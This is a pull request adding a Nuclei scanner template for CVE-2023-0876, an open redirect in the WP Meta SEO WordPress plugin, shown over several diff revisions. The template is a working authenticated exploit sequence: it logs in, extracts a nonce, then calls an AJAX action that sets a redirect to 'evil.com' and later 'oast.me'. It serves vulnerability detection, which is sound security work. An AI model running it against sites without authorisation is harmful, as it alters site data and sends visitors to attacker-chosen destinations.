### PR TITLE
CVE-2023-0876 (vKEV)

### DIFF
--- a/http/cves/2023/CVE-2023-0876.yaml
+++ b/http/cves/2023/CVE-2023-0876.yaml
@@ -21,6 +21,7 @@ info:
     cpe: cpe:2.3:a:joomunited:wp_meta_seo:*:*:*:*:*:wordpress:*:*
   metadata:
     verified: true
+    fofa-query: body="/wp-content/plugins/wp-meta-seo/"
     vendor: joomunited
     product: wp_meta_seo
     framework: wordpress

--- a/http/cves/2023/CVE-2023-0876.yaml
+++ b/http/cves/2023/CVE-2023-0876.yaml
@@ -1,0 +1,102 @@
+id: CVE-2023-0876
+
+info:
+  name: WordPress Meta SEO - Open Redirect in <= 4.5.2
+  author: Khalid6468
+  severity: medium
+  description: |
+    The plugin does not authorize several ajax actions, allowing low-privilege users to make updates to certain data and leading to an arbitrary redirect vulnerability.
+  remediation: |
+    Update the plugin to version 4.5.3 or later to fix the arbitrary redirect vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0876
+    - https://api.first.org/data/v1/epss?cve=CVE-2023-0876&pretty=true
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-601
+    epss-score: 0.00111
+    epss-percentile: 0.30174
+    cpe: cpe:2.3:a:joomunited:wp_meta_seo:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 2
+
+variables:
+  link_id: "1"
+  link_endpoint: "/?p=99999"
+  redirect_url: "https://evil.com"
+
+flow: http(1) && http(2) && http(3) && http(4)
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      matchers:
+        - type: dsl
+          dsl:
+            - 'status_code == 302 || status_code == 200'
+            - 'contains(header, "wordpress_logged_in")'
+          condition: and
+          internal: true
+
+  - raw:
+      - |
+        GET /wp-admin/ HTTP/1.1
+        Host: {{Hostname}}
+
+      matchers:
+        - type: dsl
+          dsl:
+            - "status_code == 200"
+            - "contains(body, 'wpms_nonce')"
+          condition: and
+          internal: true
+
+      extractors:
+        - type: regex
+          name: wpms_nonce
+          group: 1
+          regex:
+            - 'wpms_nonce.*?([0-9a-z]+)'
+          internal: true
+          part: body
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: "application/x-www-form-urlencoded"
+
+        action=wpms&wpms_nonce={{wpms_nonce}}&task=update_link_redirect&link_id={{link_id}}&link_redirect={{redirect_url}}
+
+      matchers:
+        - type: dsl
+          dsl:
+            - "status_code == 200"
+            - "contains(body, 'status') || contains(body, 'success') || contains(body, 'updated') || contains(body, 'redirect')"
+          condition: and
+          internal: true
+
+  - raw:
+      - |
+        GET {{link_endpoint}} HTTP/1.1
+        Host: {{Hostname}}
+
+      redirects: false
+      max-redirects: 0
+
+      matchers:
+        - type: dsl
+          dsl:
+            - "status_code == 302"
+            - 'contains(header, "Location: {{redirect_url}}")'
+            - 'contains(header, "X-Redirect-By: WordPress")'
+          condition: and

--- a/http/cves/2023/CVE-2023-0876.yaml
+++ b/http/cves/2023/CVE-2023-0876.yaml
@@ -90,7 +90,7 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         action=wpms&wpms_nonce={{wpms_nonce}}&task=update_link_redirect&link_id={{link_id}}&link_redirect={{redirect_url}}
-
+#link_id exists in wp_wpms_links
     matchers:
       - type: dsl
         dsl:

--- a/http/cves/2023/CVE-2023-0876.yaml
+++ b/http/cves/2023/CVE-2023-0876.yaml
@@ -39,64 +39,64 @@ http:
 
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
 
-      matchers:
-        - type: dsl
-          dsl:
-            - 'status_code == 302 || status_code == 200'
-            - 'contains(header, "wordpress_logged_in")'
-          condition: and
-          internal: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 302 || status_code == 200'
+          - 'contains(header, "wordpress_logged_in")'
+        condition: and
+        internal: true
 
   - raw:
       - |
         GET /wp-admin/ HTTP/1.1
         Host: {{Hostname}}
 
-      matchers:
-        - type: dsl
-          dsl:
-            - "status_code == 200"
-            - "contains(body, 'wpms_nonce')"
-          condition: and
-          internal: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, 'wpms_nonce')"
+        condition: and
+        internal: true
 
-      extractors:
-        - type: regex
-          name: wpms_nonce
-          group: 1
-          regex:
-            - 'wpms_nonce.*?([0-9a-z]+)'
-          internal: true
-          part: body
+    extractors:
+      - type: regex
+        name: wpms_nonce
+        group: 1
+        regex:
+          - 'wpms_nonce.*?([0-9a-z]+)'
+        internal: true
+        part: body
 
   - raw:
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: "application/x-www-form-urlencoded"
+        Content-Type: application/x-www-form-urlencoded
 
         action=wpms&wpms_nonce={{wpms_nonce}}&task=update_link_redirect&link_id={{link_id}}&link_redirect={{redirect_url}}
 
-      matchers:
-        - type: dsl
-          dsl:
-            - "status_code == 200"
-            - "contains(body, 'status') || contains(body, 'success') || contains(body, 'updated') || contains(body, 'redirect')"
-          condition: and
-          internal: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, 'status') || contains(body, 'success') || contains(body, 'updated') || contains(body, 'redirect')"
+        condition: and
+        internal: true
 
   - raw:
       - |
         GET {{link_endpoint}} HTTP/1.1
         Host: {{Hostname}}
 
-      redirects: false
-      max-redirects: 0
+    redirects: false
+    max-redirects: 0
 
-      matchers:
-        - type: dsl
-          dsl:
-            - "status_code == 302"
-            - 'contains(header, "Location: {{redirect_url}}")'
-            - 'contains(header, "X-Redirect-By: WordPress")'
-          condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 302"
+          - 'contains(header, "Location: {{redirect_url}}")'
+          - 'contains(header, "X-Redirect-By: WordPress")'
+        condition: and

--- a/http/cves/2023/CVE-2023-0876.yaml
+++ b/http/cves/2023/CVE-2023-0876.yaml
@@ -1,43 +1,57 @@
 id: CVE-2023-0876
 
 info:
-  name: WordPress Meta SEO - Open Redirect in <= 4.5.2
+  name: WordPress Meta SEO <= 4.5.2 - Open Redirect
   author: Khalid6468
   severity: medium
   description: |
-    The plugin does not authorize several ajax actions, allowing low-privilege users to make updates to certain data and leading to an arbitrary redirect vulnerability.
+    The WP Meta SEO WordPress plugin before 4.5.3 did not authorize several AJAX actions, which allowed low-privilege users to update certain data and resulted in an arbitrary redirect vulnerability.
   remediation: |
     Update the plugin to version 4.5.3 or later to fix the arbitrary redirect vulnerability.
   reference:
     - https://wpscan.com/vulnerability/1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea/
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-0876
     - https://api.first.org/data/v1/epss?cve=CVE-2023-0876&pretty=true
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
+    cve-id: CVE-2023-0876
     cwe-id: CWE-601
     epss-score: 0.00111
-    epss-percentile: 0.30174
+    epss-percentile: 0.30483
     cpe: cpe:2.3:a:joomunited:wp_meta_seo:*:*:*:*:*:wordpress:*:*
   metadata:
     verified: true
-    max-request: 2
+    vendor: joomunited
+    product: wp_meta_seo
+    framework: wordpress
+  tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,wp-meta-seo,redirect
 
 variables:
-  link_id: "1"
-  link_endpoint: "/?p=99999"
-  redirect_url: "https://evil.com"
+  link_endpoint: "{{rand_text_numeric(5)}}"
+  redirect_url: "https://oast.me"
 
-flow: http(1) && http(2) && http(3) && http(4)
+flow: http(1) && http(2) && http(3) && http(4) && http(5)
 
 http:
+  - raw:
+      - |
+        GET /?p={{link_endpoint}} HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 404"
+        internal: true
+
   - raw:
       - |
         POST /wp-login.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
 
     matchers:
       - type: dsl
@@ -66,8 +80,8 @@ http:
         group: 1
         regex:
           - 'wpms_nonce.*?([0-9a-z]+)'
-        internal: true
         part: body
+        internal: true
 
   - raw:
       - |
@@ -87,7 +101,7 @@ http:
 
   - raw:
       - |
-        GET {{link_endpoint}} HTTP/1.1
+        GET /?p={{link_endpoint}} HTTP/1.1
         Host: {{Hostname}}
 
     redirects: false
@@ -98,5 +112,4 @@ http:
         dsl:
           - "status_code == 302"
           - 'contains(header, "Location: {{redirect_url}}")'
-          - 'contains(header, "X-Redirect-By: WordPress")'
         condition: and

--- a/http/cves/2023/CVE-2023-0876.yaml
+++ b/http/cves/2023/CVE-2023-0876.yaml
@@ -90,7 +90,7 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         action=wpms&wpms_nonce={{wpms_nonce}}&task=update_link_redirect&link_id={{link_id}}&link_redirect={{redirect_url}}
-#link_id exists in wp_wpms_links
+#link_id exists in wp_wpms_links table
     matchers:
       - type: dsl
         dsl:

--- a/http/cves/2023/CVE-2023-0876.yaml
+++ b/http/cves/2023/CVE-2023-0876.yaml
@@ -30,9 +30,30 @@ variables:
   link_endpoint: "{{rand_text_numeric(5)}}"
   redirect_url: "https://oast.me"
 
-flow: http(1) && http(2) && http(3) && http(4) && http(5)
+flow: http(1) || http(2) && http(3) && http(4) && http(5) && http(6)
 
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/wp-meta-seo/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - compare_versions(version, '<= 4.5.2')
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        name: version
+        group: 1
+        regex:
+          - 'Stable tag: ([0-9.]+)'
+        internal: true
+
   - raw:
       - |
         GET /?p={{link_endpoint}} HTTP/1.1
@@ -90,12 +111,12 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         action=wpms&wpms_nonce={{wpms_nonce}}&task=update_link_redirect&link_id={{link_id}}&link_redirect={{redirect_url}}
-#link_id exists in wp_wpms_links table
+#The WP Meta SEO plugin automatically created entries in the wp_wpms_links table for 404 pages, with the link_id field stored in this DB table. This link_id input was required to validate the redirection.
     matchers:
       - type: dsl
         dsl:
           - "status_code == 200"
-          - "contains(body, 'status') || contains(body, 'success') || contains(body, 'updated') || contains(body, 'redirect')"
+          - "contains_any(body, 'status', 'contains','success', 'updated','redirect')"
         condition: and
         internal: true
 


### PR DESCRIPTION

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2023-0876 / Added CVE-2023-0876 / Updated CVE-2023-0876
- References:
   - https://wpscan.com/vulnerability/1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea/
   - https://nvd.nist.gov/vuln/detail/CVE-2023-0876
   - https://api.first.org/data/v1/epss?cve=CVE-2023-0876&pretty=true

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<img width="1401" height="555" alt="Screenshot 2025-09-12 002455" src="https://github.com/user-attachments/assets/a1e79f43-914a-4a14-ab78-243f279bc255" />

<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)